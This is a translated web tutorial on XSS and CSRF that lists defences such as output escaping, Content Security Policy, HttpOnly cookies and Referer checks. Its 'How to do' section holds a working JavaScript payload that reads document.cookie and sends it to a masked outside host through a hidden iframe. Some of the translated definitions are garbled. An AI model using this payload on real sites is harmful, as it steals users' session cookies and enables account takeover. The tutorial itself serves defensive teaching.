How to protect against XSS and CSRF attacks

XSS: Cross-site scripting (often referred to as XSS) is a security vulnerability attack on website applications and is a type of code injection. It allows a malicious user to inject code onto a web page, which will affect other users when viewing the web page. This type of attack usually involves HTML and user-side scripting languages.

CSRF: Cross-site request forgery (English: Cross-site request forgery), also known as one-click attack or session riding, usually abbreviated as CSRF or XSRF, is a kind of coercion when the user is currently logged in An attack method that performs unintended operations on a web application.

A simple understanding is:

XSS: Through client-side scripting language (the most common such as: JavaScript)
Publishing a piece of malicious JavaScript code in a forum post is script injection. If this If the code content requests an external server, it is called XSS!

CSRF: Also known as XSRF, it pretends to be a user to initiate a request (without the user's knowledge), and completes some requests against the user's wishes (such as malicious posting, deleting posts, changing passwords, sending emails, etc.).

How to do

// 用 <script type="text/javascript"></script> 包起来放在评论中
(function(window, document) {
    // 构造泄露信息用的 URL
    var cookies = document.cookie;
    var xssURIBase = "http://********";
    var xssURI = xssURIBase + window.encodeURI(cookies);
    // 建立隐藏 iframe 用于通讯
    var hideFrame = document.createElement("iframe");
    hideFrame.height = 0;
    hideFrame.width = 0;
    hideFrame.style.display = "none";
    hideFrame.src = xssURI;
    // 开工
    document.body.appendChild(hideFrame);
})(window, document);

How to protect

Central idea: All data from external sources must be filtered by our server code before it can be displayed on the page. In other words, all external data is illegal and must be filtered.

1. Try to use innerText (IE) and textContent (Firefox), that is, jQuery's text() to output text content
2. If you must use innerHTML and other functions, you need to do something similar to PHP Filtering of htmlspecialchars

3. When outputting html, add the Http Header of Content Security Policy
(Function: It can prevent the page from being attacked by XSS and embedding third-party script files, etc.)
( Defects: IE or lower version browsers may not support it)
4. When setting cookies, add the HttpOnly parameter
(Function: It can prevent the cookie information from being stolen when the page is attacked by XSS. It is compatible with IE6)
(Defect: The JS code of the website itself cannot operate cookies, and its function is limited and can only ensure the security of cookies)
5. When developing the API, check the Referer parameter of the request
(Function: Can prevent CSRF attacks to a certain extent)
(Defect: In IE or lower version browsers, the Referer parameter can be forged)

Related recommendations:

PHP implementation example code to prevent cross-site and xss attacks

Detailed explanation of JS writing XSS cookie stealer to steal passwords

Details of XSS and CSRF introduce

The above is the detailed content of How to protect against XSS and CSRF attacks. For more information, please follow other related articles on the PHP Chinese website!